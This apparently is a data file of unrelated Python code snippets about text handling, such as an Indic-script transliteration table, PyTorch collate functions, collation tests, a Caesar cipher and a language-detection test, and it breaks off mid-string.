self.trans[u\"ୡ\"] = \"ll\"\n self.trans[u\"ૠ\"] = \"rr\"\n self.trans[u\"੫\"] = \"5\"\n self.trans[u\"ୱ\"] = \"wa\"\n self.trans[u\"૰\"] = \"sign\"\n self.trans[u\"൵\"] = \"quarters\"\n self.trans[u\"ਫ਼\"] = \"fa\"\n self.trans[u\"ઁ\"] = \"candrabindu\"\n self.trans[u\"ਆ\"] = \"aa\"\n self.trans[u\"ઑ\"] = \"o\"\n self.trans[u\"ଐ\"] = \"ai\"\n self.trans[u\"ഔ\"] = \"au\"\n self.trans[u\"ਖ\"] = \"kha\"\n self.trans[u\"ડ\"] = \"dda\"\n self.trans[u\"ଠ\"] = \"ttha\"\n self.trans[u\"ത\"] = \"ta\"\n self.trans[u\"ਦ\"] = \"da\"\n self.trans[u\"ର\"] = \"ra\"\n self.trans[u\"ഴ\"] = \"llla\"\n self.trans[u\"ુ\"] = \"u\"\n self.trans[u\"ୀ\"] = \"ii\"\n self.trans[u\"ൄ\"] = \"rr\"\n self.trans[u\"ૡ\"] = \"ll\"\n self.trans[u\"ୠ\"] = \"rr\"\n self.trans[u\"੦\"] = \"0\"\n self.trans[u\"૱\"] = \"sign\"\n self.trans[u\"୰\"] = \"isshar\"\n self.trans[u\"൴\"] = \"1/2\"\n self.trans[u\"ਁ\"] = \"bindi\"\n self.trans[u\"આ\"] = \"aa\"\n self.trans[u\"ଋ\"] = \"r\"\n self.trans[u\"ഏ\"] = \"ee\"\n self.trans[u\"ખ\"] = \"kha\"\n self.trans[u\"ଛ\"] = \"cha\"\n self.trans[u\"ട\"] = \"tta\"\n self.trans[u\"ਡ\"] = \"dda\"\n self.trans[u\"દ\"] = \"da\"\n self.trans[u\"ଫ\"] = \"pha\"\n self.trans[u\"യ\"] = \"ya\"\n self.trans[u\"શ\"] = \"sha\"\n self.trans[u\"ി\"] = \"i\"\n self.trans[u\"ੁ\"] = \"u\"\n self.trans[u\"ୋ\"] = \"o\"\n self.trans[u\"ੑ\"] = \"udaat\"\n self.trans[u\"૦\"] = \"0\"\n self.trans[u\"୫\"] = \"5\"\n self.trans[u\"൯\"] = \"9\"\n self.trans[u\"ੱ\"] = \"addak\"\n self.trans[u\"ൿ\"] = \"k\"\n self.trans[u\"ആ\"] = \"aa\"\n self.trans[u\"ଊ\"] = \"uu\"\n self.trans[u\"એ\"] = \"e\"\n self.trans[u\"ਔ\"] = \"au\"\n self.trans[u\"ഖ\"] = \"kha\"\n self.trans[u\"ଚ\"] = \"ca\"\n self.trans[u\"ટ\"] = \"tta\"\n self.trans[u\"ਤ\"] = \"ta\"\n self.trans[u\"ദ\"] = \"da\"\n self.trans[u\"ପ\"] = \"pa\"\n self.trans[u\"ય\"] = \"ya\"\n self.trans[u\"ശ\"] = \"sha\"\n self.trans[u\"િ\"] = \"i\"\n self.trans[u\"െ\"] = \"e\"\n self.trans[u\"൦\"] = \"0\"\n self.trans[u\"୪\"] = \"4\"\n self.trans[u\"૯\"] = \"9\"\n self.trans[u\"ੴ\"] = \"onkar\"\n self.trans[u\"ଅ\"] = \"a\"\n self.trans[u\"ਏ\"] = \"ee\"\n self.trans[u\"କ\"] = \"ka\"\n self.trans[u\"ઔ\"] = \"au\"\n self.trans[u\"ਟ\"] = \"tta\"\n self.trans[u\"ഡ\"] = \"dda\"\n self.trans[u\"ଥ\"] = \"tha\"\n self.trans[u\"ત\"] = \"ta\"\n self.trans[u\"ਯ\"] = \"ya\"\n self.trans[u\"റ\"] = \"rra\"\n self.trans[u\"ଵ\"] = \"va\"\n self.trans[u\"ਿ\"] = \"i\"\n self.trans[u\"ു\"] = \"u\"\n self.trans[u\"ૄ\"] = \"rr\"\n self.trans[u\"ൡ\"] = \"ll\"\n self.trans[u\"੯\"] = \"9\"\n self.trans[u\"൱\"] = \"100\"\n self.trans[u\"୵\"] = \"sixteenth\"\n self.trans[u\"અ\"] = \"a\"\n self.trans[u\"ਊ\"] = \"uu\"\n self.trans[u\"ഐ\"] = \"ai\"\n self.trans[u\"ક\"] = \"ka\"\n self.trans[u\"ଔ\"] = \"au\"\n self.trans[u\"ਚ\"] = \"ca\"\n self.trans[u\"ഠ\"] = \"ttha\"\n self.trans[u\"થ\"] = \"tha\"\n self.trans[u\"ତ\"] = \"ta\"\n self.trans[u\"ਪ\"] = \"pa\"\n self.trans[u\"ര\"] = \"ra\"\n self.trans[u\"વ\"] = \"va\"\n self.trans[u\"ീ\"] = \"ii\"\n self.trans[u\"ૅ\"] = \"e\"\n self.trans[u\"ୄ\"] = \"rr\"\n self.trans[u\"ൠ\"] = \"rr\"\n self.trans[u\"ਜ਼\"] = \"za\"\n self.trans[u\"੪\"] = \"4\"\n self.trans[u\"൰\"] = \"10\"\n self.trans[u\"୴\"] = \"quarters\"\n self.trans[u\"ਅ\"] = \"a\"\n self.trans[u\"ഋ\"] = \"r\"\n self.trans[u\"ઊ\"] = \"uu\"\n self.trans[u\"ଏ\"] = \"e\"\n self.trans[u\"ਕ\"] = \"ka\"\n self.trans[u\"ഛ\"] = \"cha\"\n self.trans[u\"ચ\"] = \"ca\"\n self.trans[u\"ଟ\"] = \"tta\"\n self.trans[u\"ਥ\"] = \"tha\"\n self.trans[u\"ഫ\"] = \"pha\"\n self.trans[u\"પ\"] = \"pa\"\n self.trans[u\"ଯ\"] = \"ya\"\n self.trans[u\"ਵ\"] = \"va\"\n self.trans[u\"ି\"] = \"i\"\n self.trans[u\"ോ\"] = \"oo\"\n self.trans[u\"ୟ\"] = \"yya\"\n self.trans[u\"൫\"] = \"5\"\n self.trans[u\"૪\"] = \"4\"\n self.trans[u\"୯\"] = \"9\"\n self.trans[u\"ੵ\"] = \"yakash\"\n self.trans[u\"ൻ\"] = \"n\"\n self.trans[u\"ઃ\"] = \"visarga\"\n self.trans[u\"ം\"] = \"anusvara\"\n self.trans[u\"ਈ\"] = \"ii\"\n self.trans[u\"ઓ\"] = \"o\"\n self.trans[u\"ഒ\"] = \"o\"\n self.trans[u\"ਘ\"] = \"gha\"\n self.trans[u\"ଞ\"] = \"nya\"\n self.trans[u\"ણ\"] = \"nna\"\n self.trans[u\"ഢ\"] = \"ddha\"\n self.trans[u\"ਲ਼\"] = \"lla\"\n self.trans[u\"ਨ\"] = \"na\"\n self.trans[u\"ମ\"] = \"ma\"\n self.trans[u\"ળ\"] = \"lla\"\n self.trans[u\"ല\"] = \"la\"\n self.trans[u\"ਸ\"] = \"sa\"\n self.trans[u\"¿\"] = \"?\"\n self.trans[u\"ା\"] = \"aa\"\n self.trans[u\"ૃ\"] = \"r\"\n self.trans[u\"ൂ\"] = \"uu\"\n self.trans[u\"ੈ\"] = \"ai\"\n self.trans[u\"ૣ\"] = \"ll\"\n self.trans[u\"ൢ\"] = \"l\"\n self.trans[u\"੨\"] = \"2\"\n self.trans[u\"୮\"] = \"8\"\n self.trans[u\"൲\"] = \"1000\"\n self.trans[u\"ਃ\"] = \"visarga\"\n self.trans[u\"ଉ\"] = \"u\"\n self.trans[u\"ઈ\"] = \"ii\"\n self.trans[u\"ਓ\"] = \"oo\"\n self.trans[u\"ଙ\"] = \"nga\"\n self.trans[u\"ઘ\"] = \"gha\"\n self.trans[u\"ഝ\"] = \"jha\"\n self.trans[u\"ਣ\"] = \"nna\"\n self.trans[u\"ન\"] = \"na\"\n self.trans[u\"ഭ\"] = \"bha\"\n self.trans[u\"ଜ\"] = \"ja\"\n self.trans[u\"ହ\"] = \"ha\"\n self.trans[u\"સ\"] = \"sa\"\n self.trans[u\"ഽ\"] = \"avagraha\"\n self.trans[u\"ૈ\"] = \"ai\"\n self.trans[u\"്\"] = \"virama\"\n self.trans[u\"୩\"] = \"3\"\n self.trans[u\"૨\"] = \"2\"\n self.trans[u\"൭\"] = \"7\"\n self.trans[u\"ੳ\"] = \"ura\"\n self.trans[u\"ൽ\"] = \"l\"\n self.trans[u\"ઉ\"] = \"u\"\n self.trans[u\"ଈ\"] = \"ii\"\n self.trans[u\"ഌ\"] = \"l\"\n self.trans[u\"ઙ\"] = \"nga\"\n self.trans[u\"ଘ\"] = \"gha\"\n self.trans[u\"ജ\"] = \"ja\"\n self.trans[u\"ਞ\"] = \"nya\"\n self.trans[u\"ନ\"] = \"na\"\n self.trans[u\"ബ\"] = \"ba\"\n self.trans[u\"ਮ\"] = \"ma\"\n self.trans[u\"હ\"] = \"ha\"\n self.trans[u\"ସ\"] = \"sa\"\n self.trans[u\"ਾ\"] = \"aa\"\n self.trans[u\"ૉ\"] = \"o\"\n self.trans[u\"ୈ\"] = \"ai\"\n self.trans[u\"ൌ\"] = \"au\"\n self.trans[u\"૩\"] = \"3\"\n self.trans[u\"୨\"] = \"2\"\n self.trans[u\"൬\"] = \"6\"\n self.trans[u\"੮\"] = \"8\"\n self.trans[u\"ർ\"] = \"rr\"\n self.trans[u\"ଃ\"] = \"visarga\"\n self.trans[u\"ഇ\"] = \"i\"\n self.trans[u\"ਉ\"] = \"u\"\n self.trans[u\"ଓ\"] = \"o\"\n self.trans[u\"ഗ\"] = \"ga\"\n self.trans[u\"ਙ\"] = \"nga\"\n self.trans[u\"ઞ\"] = \"nya\"\n self.trans[u\"ଣ\"] = \"nna\"\n self.trans[u\"ധ\"] = \"dha\"\n self.trans[u\"મ\"] = \"ma\"\n self.trans[u\"ଳ\"] = \"lla\"\n self.trans[u\"ഷ\"] = \"ssa\"\n self.trans[u\"ਹ\"] = \"ha\"\n self.trans[u\"ਗ਼\"] = \"ghha\"\n self.trans[u\"ા\"] = \"aa\"\n self.trans[u\"ୃ\"] = \"r\"\n self.trans[u\"േ\"] = \"ee\"\n self.trans[u\"ൗ\"] = \"mark\"\n self.trans[u\"ଢ଼\"] = \"rha\"\n self.trans[u\"ୣ\"] = \"ll\"\n self.trans[u\"൧\"] = \"1\"\n self.trans[u\"੩\"] = \"3\"\n self.trans[u\"૮\"] = \"8\"\n self.trans[u\"୳\"] = \"half\"\n for char in self.trans:\n value = self.trans[char]\n if value == \"?\":\n continue\n while value.encode(encoding, 'replace').decode(encoding) == \"?\" and value in self.trans:\n assert value != self.trans[value], \"%r == self.trans[%r]!\" % (value, value)\n value = self.trans[value]\n self.trans[char] = value", "def collate_fn(data):\n\toutput = dict()\n\n\tfor name in ['answer_ID','query_ID']:\n\t\toutput[name] = [ _[name] for _ in data]\n\n\n\tfor name in ['query_len','answer_len']:\n\t\ttemp = [ _[name] for _ in data]\t \n\t\toutput[name] = torch.stack(temp, dim=0) \n\t\n\t#deal with source and target\n\tfor name in ['answer','query']:\n\t\tlength = output['{0}_len'.format(name)]\n\t\tl = length.max().item()\n\n\t\tfor i in range(len(data)):\n\t\t\tif(l-length[i].item()>0):\n\t\t\t\tdata[i][name] = torch.cat([data[i][name],torch.zeros(l-length[i].item(),dtype=torch.long)],dim=-1)\n\n\t\ttemp = [ _[name] for _ in data]\n\t\t\n\t\toutput[name] = torch.stack(temp, dim=0).long()\n\t\t\n\n\treturn output", "def collate_fn(data):\n\n # Sort a data list by tweet length (descending order).\n # data.sort(key=lambda x: len(x[1]), reverse=True)\n texts_, targets_, relations = zip(*data)\n\n # Merge captions (from tuple of 1D tensor to 2D tensor).\n lengths = [len(text) for text in texts_]\n texts = torch.zeros(len(texts_), max(lengths)).long()\n for i, text in enumerate(texts_):\n end = lengths[i]\n texts[i, :end] = text[:end]\n\n lengths_targets = [len(text) for text in targets_]\n targets = torch.zeros(len(targets_), max(lengths_targets)).long()\n for i, text in enumerate(targets_):\n end = lengths_targets[i]\n targets[i, :end] = text[:end]\n return targets, lengths, texts, torch.tensor(relations).view(-1)", "def header_converter(self, s):\n\n header = clean_string(s.lower().replace(\"_\", \" \"))\n if hasattr(self, \"locale\"):\n return self.column_headers[self.locale].get(header, header)\n else:\n return header", "def test_char(self):\n\n columns = [\n (mssql.MSChar, [], {}, \"CHAR\"),\n (mssql.MSChar, [1], {}, \"CHAR(1)\"),\n (\n mssql.MSChar,\n [1],\n {\"collation\": \"Latin1_General_CI_AS\"},\n \"CHAR(1) COLLATE Latin1_General_CI_AS\",\n ),\n (mssql.MSNChar, [], {}, \"NCHAR\"),\n (mssql.MSNChar, [1], {}, \"NCHAR(1)\"),\n (\n mssql.MSNChar,\n [1],\n {\"collation\": \"Latin1_General_CI_AS\"},\n \"NCHAR(1) COLLATE Latin1_General_CI_AS\",\n ),\n (mssql.MSString, [], {}, \"VARCHAR(max)\"),\n (mssql.MSString, [1], {}, \"VARCHAR(1)\"),\n (\n mssql.MSString,\n [1],\n {\"collation\": \"Latin1_General_CI_AS\"},\n \"VARCHAR(1) COLLATE Latin1_General_CI_AS\",\n ),\n (mssql.MSNVarchar, [], {}, \"NVARCHAR(max)\"),\n (mssql.MSNVarchar, [1], {}, \"NVARCHAR(1)\"),\n (\n mssql.MSNVarchar,\n [1],\n {\"collation\": \"Latin1_General_CI_AS\"},\n \"NVARCHAR(1) COLLATE Latin1_General_CI_AS\",\n ),\n (mssql.MSText, [], {}, \"TEXT\"),\n (\n mssql.MSText,\n [],\n {\"collation\": \"Latin1_General_CI_AS\"},\n \"TEXT COLLATE Latin1_General_CI_AS\",\n ),\n (mssql.MSNText, [], {}, \"NTEXT\"),\n (\n mssql.MSNText,\n [],\n {\"collation\": \"Latin1_General_CI_AS\"},\n \"NTEXT COLLATE Latin1_General_CI_AS\",\n ),\n ]\n\n metadata = MetaData()\n table_args = [\"test_mssql_charset\", metadata]\n for index, spec in enumerate(columns):\n type_, args, kw, res = spec\n table_args.append(\n Column(\"c%s\" % index, type_(*args, **kw), nullable=None)\n )\n\n charset_table = Table(*table_args)\n dialect = mssql.dialect()\n gen = dialect.ddl_compiler(dialect, schema.CreateTable(charset_table))\n\n for col in charset_table.c:\n index = int(col.name[1:])\n testing.eq_(\n gen.get_column_specification(col),\n \"%s %s\" % (col.name, columns[index][3]),\n )\n self.assert_(repr(col))", "def nintl(self):", "def use_en(self):\n pass", "def get_default_collations(self):\n collations = self.query(sql.default_collation)\n charset_collations = {}\n for r in collations:\n charset_collations[r[\"CHARACTER_SET_NAME\"]] = r[\"COLLATION_NAME\"]\n\n # Populate utf8mb4 override\n utf8_override = self.query(\n sql.get_global_variable(\"default_collation_for_utf8mb4\")\n )\n if utf8_override and \"utf8mb4\" in charset_collations:\n charset_collations[\"utf8mb4\"] = utf8_override[0][\"Value\"]\n return charset_collations", "def load_colormaps():\n\treturn load_builtin_data('colormaps')", "def search2(ln, fn):\r\n with conn:\r\n c.execute(\"\"\"SELECT * FROM personnel WHERE first=:first COLLATE NOCASE AND last=:last COLLATE NOCASE\"\"\",\r\n {'last': ln, 'first': fn})\r\n return c.fetchall()", "def clevr_collate_fn(data):\n\tdata = sorted(data, key=lambda x: len(x[1]), reverse=True)\n\timg, q, len_q, a, f, idx = list(zip(*data))\n\tq = torch.nn.utils.rnn.pad_sequence(q, batch_first=True)\n\treturn torch.stack(img), q, list(len_q), torch.stack(a), list(f), list(idx)", "def c(k):\n if isinstance(k, str):\n return k.lower() if ord(k) % 2 == 0 else k.upper()\n return k", "def not_capitalized(): # noqa: D416", "def collate_fn(data):\n # sort a data list by caption length\n data.sort(key=lambda x: len(x[1]), reverse=True)\n zipped_data = list(zip(*data))\n # align_tensor = len(tokenized_caption) * len(whole_caption)\n images, captions, ids, img_ids, = zipped_data\n images = torch.stack(images, 0)\n targets = torch.zeros(len(captions), len(captions[0])).long()\n lengths = [len(cap) for cap in captions]\n for i, cap in enumerate(captions):\n end = len(cap)\n targets[i, :end] = cap[:end]\n return images, targets, lengths, ids", "def translate_leet(phrase):", "def correctWord (w):\n\n if len(re.findall(ur\"[а-я]\",w))>len(re.findall(ur\"[a-z]\",w)):\n return w.translate(eng_rusTranslateTable)\n else:\n return w.translate(rus_engTranslateTable)", "def _translate(self):\r\n\r\n for place, pseudo_binary in self.letters.items():\r\n for letter in self.alphabet:\r\n\r\n with open(os.path.join(self.training_data_folder, letter + '.json'), 'r', encoding = 'utf-8') as js:\r\n data = json.loads(js.read())\r\n\r\n if pseudo_binary in data:\r\n self.result[place] = letter\r\n break\r\n\r\n else:\r\n self.result[place] = '-'\r\n\r\n if not self.devmode:\r\n return 'Not solved'\r\n\r\n return ''.join(self.result.values())", "def applyCoder(text, coder):\n res=''\n for ch in text:\n if ch in string.ascii_lowercase:\n res = res + coder[ch]\n elif ch in string.ascii_uppercase:\n res = res + coder[ch]\n else:\n res = res + ch\n return res", "def translate(l, a, c):\n try:\n i = int(l[0])\n a.append(i)\n except ValueError:\n return False\n for j in range(97, 97 + c):\n if l[1].lower() == chr(j):\n a.append(j - 97)\n break\n elif j == (97 + c):\n return False\n try:\n i = int(l[2])\n a.append(i)\n except ValueError:\n return False\n for j in range(97, 97 + c):\n if l[3].lower() == chr(j):\n a.append(j - 97)\n break\n elif j == (97 + c):\n return False\n return True", "def ladcased(normal):\r\n\r\n ladified = ''\r\n for i, c in enumerate(normal):\r\n ladified += c.lower() if (i % 2 == 0) else c.upper()\r\n\r\n return ladified", "def map_caesar(key, plaintext):\n letters = string.ascii_lowercase\n mask = letters[key:] + letters[:key]\n transtab = str.maketrans(letters, mask)\n return plaintext.translate(transtab)", "def translateLoc(loc):\n\tif(loc[0].isalpha()):\t\n\t\treturn [int(loc[1:])-1,colDict[loc[0]],'V']\n\telse:\n\t\treturn [int(loc[:-1])-1, colDict[loc[-1]],'H']", "def translate(table, data, compress=True):\n\tout=data\n\tpoint=START_CHR\n\tfor conv in table:\n\t\tout=out.replace(*((conv, chr(point)) if compress else (chr(point), conv)))\n\t\tpoint+=1\n\treturn out", "def build_collate_fn(\n cls, args: argparse.Namespace, train: bool\n ) -> Callable[[Sequence[Dict[str, np.ndarray]]], Dict[str, torch.Tensor]]:\n raise NotImplementedError", "def mk_collation_from_prevstate(shard_chain, state, coinbase):\n # state = state or shard_chain.state\n collation = Collation(CollationHeader())\n collation.header.shard_id = shard_chain.shard_id\n collation.header.prev_state_root = state.trie.root_hash\n collation.header.coinbase = coinbase\n collation.transactions = []\n return collation", "def cz_compare(a, b):\n ma = __unicode_to_ascii(unicode(a))\n mb = __unicode_to_ascii(unicode(b))\n return cmp(ma, mb)", "def correct_col(column_name):\n corr_col_name = column_name\n # Corrected South America\n if 'Bolivia' in column_name:\n corr_col_name = 'Bolivia'\n elif 'Venezuela' in column_name:\n corr_col_name = 'Venezuela'\n # Corrected Asia\n elif 'Hong Kong' in column_name:\n corr_col_name = 'Hong Kong'\n elif 'Macao' in column_name:\n corr_col_name = 'Macao'\n elif 'China, mainland' in column_name:\n corr_col_name = 'China'\n elif 'Taiwan' in column_name:\n corr_col_name = 'Taiwan'\n elif 'Democratic People' in column_name:\n corr_col_name = 'North Korea'\n elif 'Republic of Korea' in column_name:\n corr_col_name = 'South Korea'\n elif 'Iran' in column_name:\n corr_col_name = 'Iran'\n elif 'Lao' in column_name:\n corr_col_name = 'Laos'\n elif 'Palestine' in column_name:\n corr_col_name = 'Occupied Palestinian Territory'\n elif 'Syrian Arab Republic' in column_name:\n corr_col_name = 'Syria'\n # Corrected Europe\n elif 'Czech' in column_name:\n corr_col_name = 'Czech Republic'\n elif 'Macedonia' in column_name:\n corr_col_name = 'Macedonia (Republic of)'\n elif 'Moldova' in column_name:\n corr_col_name = 'Moldova'\n elif 'United Kingdom' in column_name:\n corr_col_name = 'United Kingdom'\n # Corrected Africa\n elif 'Cabo Verde' in column_name:\n corr_col_name = 'Cape Verde'\n elif 'Eswatini' in column_name:\n corr_col_name = 'Swaziland'\n elif 'Saint Helena' in column_name:\n corr_col_name = 'Saint Helena'\n elif 'Tanzania' in column_name:\n corr_col_name = 'Tanzania'\n # Corrected North America\n elif 'United States of America' in column_name:\n corr_col_name = 'USA'\n elif 'Bonaire, Sint Eustatius and Saba' in column_name:\n corr_col_name = 'Bonaire, Saint Eustatius and Saba'\n \n return corr_col_name", "def _translate_string(self, data):\n data = data.encode('iso-8859-1', errors='replace')\n\n for index, char in enumerate(data):\n yield self._meta.characters - 1 - self._ct[char]", "def sortValue(self, data):\n storedText = data.get(self.name, '')\n return storedText.lower()", "def normalize_locale(loc):\n return loc.lower().replace(\"_\", \"-\")", "def collate(filename):\r\n x=open(filename,\"r\")\r\n total_words=[]\r\n for line in x:\r\n line=line.strip(\"\\n\")\r\n line=line.split(\":\")\r\n if len(total_words)<1:\r\n total_words.append(line)\r\n else:\r\n x= len(total_words)\r\n if line[0] == total_words[x-1][0]:\r\n if int(line[1]) > int(total_words[x-1][len(total_words[x-1])-1]):\r\n total_words[x-1].append(line[1])\r\n else:\r\n total_words.append(line)\r\n y = open(\"collated_ids.txt\", \"w\")\r\n # for i in range(len(total_words)):\r\n # if len(total_words[i])<3:\r\n # total_words[i]=\":\".join(total_words[i])+\"\\n\"\r\n # else:\r\n # id=\" \".join(total_words[i][1:])\r\n # total_words[i]=total_words[i][0]+\":\"+id+\"\\n\"\r\n # y.writelines(total_words)\r\n for i in range(len(total_words)):\r\n id=\"\"\r\n for j in range(1,len(total_words[i])):\r\n id=id +total_words[i][j] +\" \"\r\n y.write(str(total_words[i][0]) + \":\" +str(id) + \"\\n\")", "def remaining_en():\n return([letter for letter in alphabet if decoded_dict[letter].upper() == letter])", "def update_collation_env_variables(state, collation):\n state.block_coinbase = collation.header.coinbase", "def __get_utl_charset(self, url_content):\n pass", "def _custom_sorter(self, key1, key2):\n\n col = self._col\n ascending = self._colSortFlag[col]\n real = self.get_real_col(col)\n item1 = self.itemDataMap[key1][real]\n item2 = self.itemDataMap[key2][real]\n\n # Internationalization of string sorting with locale module\n if isinstance(item1, str) and isinstance(item2, str):\n cmpVal = locale.strcoll(item1, item2)\n elif isinstance(item1, bytes) or isinstance(item2, bytes):\n cmpVal = locale.strcoll(str(item1), str(item2))\n else:\n cmpVal = cmp(item1, item2)\n\n # If the items are equal, then pick something else to make the sort value unique\n if cmpVal == 0:\n cmpVal = cmp(*self.GetSecondarySortValues(col, key1, key2))\n\n if ascending:\n return cmpVal\n else:\n return -cmpVal", "def sortKey(self, p_str): # real signature unknown; restored from __doc__\n return QCollatorSortKey", "def _algo_to_xfrm(self, x):\n return {\n \"aes-ctr\": \"rfc3686(ctr(aes))\",\n \"AES-GCM\": \"rfc4106(gcm(aes))\",\n \"hmac-md5\": \"hmac(md5)\",\n \"hmac-sha256\": \"hmac(sha256)\",\n \"null\": \"ecb(cipher_null)\",\n \"null-auth\": \"digest_null\"\n }[x]", "def normalize(text):\n return text.lower().translate(TRANSLATION_TABLE)", "def lower(self) -> str:", "def test_multicolumn_factorize_columns():\n df = pd.DataFrame(\n {\n \"a\": [\"hello\", \"hello\", \"sup\"],\n \"b\": [1, 2, 3],\n \"c\": [\"aloha\", \"nihao\", \"nihao\"],\n }\n ).factorize_columns(column_names=[\"a\", \"c\"])\n assert \"a_enc\" in df.columns\n assert \"c_enc\" in df.columns", "def build_messy_lookup(source,dest,ref_col):\n la = QuickGrid().open(source)\n od = QuickGrid().open(join(\"source_files\",\"local_authority_data_names.csv\"))\n\n lookup = QuickGrid()\n lookup.header = [\"la name\",ref_col]\n\n possible = [\"official-name\",\"alt-name-1\",\"alt-name-2\",\"alt-name-3\"]\n possible = [p for p in possible if p in la.header]\n for r in la:\n for p in possible:\n if r[p]:\n lookup.add([r[p],r[ref_col]])\n \n current_names = [x[0] for x in lookup]\n\n for r in od:\n if r[\"name\"] not in current_names:\n code = r[\"local-authority\"].split(\":\")[1]\n lookup.add([r[\"name\"],code])\n \n lookup.save(dest,force_unicode=True)", "def sort_nicely(col):\n convert = lambda text: int(text) if text.isdigit() else text\n alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key[col])]\n return alphanum_key", "def question_new_translate():", "def test_get_supported_locales_for_voice_datasets(self):\n pass", "def build_messy_lookup_lad(source,dest):\n la = QuickGrid().open(source)\n\n lookup = QuickGrid()\n lookup.header = [\"gss-code\",\"local-authority-code\"]\n\n possible = [\"gss-code\",\"archaic-gss-code\"]\n possible = [p for p in possible if p in la.header]\n for r in la:\n for p in possible:\n if r[p]:\n values = r[p].split(\",\")\n for v in values:\n lookup.add([v,r[\"local-authority-code\"]])\n \n lookup.save(dest,force_unicode=True)", "def test_multicolumn_factorize_columns_suffix_change():\n df = pd.DataFrame(\n {\n \"a\": [\"hello\", \"hello\", \"sup\"],\n \"b\": [1, 2, 3],\n \"c\": [\"aloha\", \"nihao\", \"nihao\"],\n }\n ).factorize_columns(column_names=[\"a\", \"c\"], suffix=\"_col\")\n assert \"a_col\" in df.columns\n assert \"c_col\" in df.columns\n assert \"a_enc\" not in df.columns\n assert \"c_enc\" not in df.columns", "def _load_transliterated_regional(self):\n# global approved, conflicts, suggestions, unknown, cldr, current\n start = self.lblFallback['text'].find('=>') + 2\n if self.lblFallback['text'][start:]:\n self.preferred.set(\\\n self._transliterate_text(self.lblFallback['text'][start:]))\n pass", "def name_comparator(last_name):\n score = 0\n\n # check if first n letters of first and last name matches\n for i in range(1, 4):\n if len(first_name) >= i and len(last_name) >= 2:\n # if previous letter does not match, don't continue\n if i > 1 and score > (i - 1) * -1:\n break\n\n # lower score by one per each matching letter\n if first_name[i - 1: i] == last_name[i - 1: i]:\n score -= 1\n\n \"\"\"detect names with umlauts and give them higher score if both have\n them, lower score if only one has them.\"\"\"\n regex = compile(r'[äöå]')\n if score == 0:\n if regex.search(first_name) and regex.search(last_name):\n score -= 1\n else:\n if bool(regex.search(last_name)) != bool(regex.search(last_name)):\n score += 1\n\n return score", "def _on_loadPrefChar(self, dummy, _prefchar=None, _lst='', _filein=''):\n\n lst = _lst if len(_lst) > 0 else self.ddnPrefChar.get()\n prefchar = _prefchar if _prefchar is not None else self.txtPrefChar\n# if lst == 'Latin1':\n## if len(self.txtPrefChar.get(0.0, 9999.9999).rstrip()) > 0:\n# if prefchar.get(0.0, 9999.9999).rstrip():\n# prefchar.insert(9999.9999, ', ' + LATIN1)\n# else:\n# prefchar.insert(9999.9999, LATIN1)\n if lst == '': #del\n prefchar.delete(0.0, 9999.9999)\n else: #load txt file\n if len(_filein) == 0:\n filein = os.path.normpath(self.BibTerm + '/'+ lst + '.csv')\n else:\n filein = _filein\n fin = codecs.open(filein, mode='r', encoding='utf-8')\n text = fin.read()\n# if len(self.txtPrefChar.get(0.0, 9999.9999).strip()) > 0:\n if prefchar.get(0.0, 9999.9999).strip():\n text = ', ' + text\n prefchar.insert(9999.9999, text)\n fin.close()", "def test_unicode_chars_in_course_name_import(self):\r\n module_store = modulestore('direct')\r\n course_id = SlashSeparatedCourseKey(u'Юникода', u'unicode_course', u'échantillon')\r\n import_from_xml(\r\n module_store,\r\n 'common/test/data/',\r\n ['2014_Uni'],\r\n target_course_id=course_id\r\n )\r\n\r\n course = module_store.get_course(course_id)\r\n self.assertIsNotNone(course)\r\n\r\n # test that course 'display_name' same as imported course 'display_name'\r\n self.assertEqual(course.display_name, u\"Φυσικά το όνομα Unicode\")", "def test_utf8_cp1252_char_file(self):\n\t\tmain.Main(['input/utf8.txt']).run()\n\t\tself.assertTrue(filecmp.cmp('output/output.csv', 'output/utf8.csv'))", "def to_language(arg: str) -> Tuple[Union[str, None], str]: \n if (low:= arg.lower()) in LANGUAGES:\n return arg\n else:\n return LANGCODES.get(low, None)", "def edits1(self, word):\n splits = [(word[:i], word[i:]) for i in range(len(word) + 1)]\n transposes = [L + R[1] + R[0] + R[2:] for L, R in splits if len(R) > 1]\n replaces = [L + c + R[1:] for L, R in splits if R for c in self.char_set]\n return set(transposes + replaces)", "def lowercase(data):\n return np.char.lower(data)", "def sortby(tree, col, descending): # 重新排序 <-- 文字版\n # grab values to sort\n data = [(tree.set(child, col), child) \\\n for child in tree.get_children('')]\n\n # if the data to be sorted is numeric change to float\n #data = change_numeric(data)\n # now sort the data in place\n data.sort(reverse=descending)\n # 數字的排法(但文字部分就無法排序)\n #data.sort(key=lambda data: int(data[0]), reverse=descending)\n\n for ix, item in enumerate(data):\n tree.move(item[1], '', ix)\n\n # switch the heading so it will sort in the opposite direction\n tree.heading(col, command=lambda col=col: sortby(tree, col, \\\n int(not descending)))", "def lower_case_really():", "def test_unicode_attribute(Script):\n s1 = ('#-*- coding: utf-8 -*-\\nclass Person():\\n'\n ' name = \"e\"\\n\\nPerson().name.')\n completions1 = Script(s1).complete()\n assert 'strip' in [c.name for c in completions1]\n s2 = ('#-*- coding: utf-8 -*-\\nclass Person():\\n'\n ' name = \"é\"\\n\\nPerson().name.')\n completions2 = Script(s2).complete()\n assert 'strip' in [c.name for c in completions2]", "def natsort_key_icase(s):\n return natsort_key(s.lower())", "def use_zh(self):\n pass", "def test_langid_benchmark(basic_multilingual):\n examples = [\n {\"text\": \"contingentiam in naturalibus causis.\", \"label\": \"la\"},\n {\"text\": \"I jak opowiadał nieżyjący już pan Czesław\", \"label\": \"pl\"},\n {\"text\": \"Sonera gilt seit längerem als Übernahmekandidat\", \"label\": \"de\"},\n {\"text\": \"与银类似,汞也可以与空气中的硫化氢反应。\", \"label\": \"zh-hans\"},\n {\"text\": \"contradictionem implicat.\", \"label\": \"la\"},\n {\"text\": \"Bis zu Prozent gingen die Offerten etwa im\", \"label\": \"de\"},\n {\"text\": \"inneren Sicherheit vorgeschlagene Ausweitung der\", \"label\": \"de\"},\n {\"text\": \"Multimedia-PDA mit Mini-Tastatur\", \"label\": \"de\"},\n {\"text\": \"Ponášalo sa to na rovnicu o dvoch neznámych.\", \"label\": \"sk\"},\n {\"text\": \"이처럼 앞으로 심판의 그 날에 다시 올 메시아가 예수 그리스도이며 , 그는 모든 인류의\", \"label\": \"ko\"},\n {\"text\": \"Die Arbeitsgruppe bedauert , dass der weit über\", \"label\": \"de\"},\n {\"text\": \"И только раз довелось поговорить с ним не вполне\", \"label\": \"ru\"},\n {\"text\": \"de a-l lovi cu 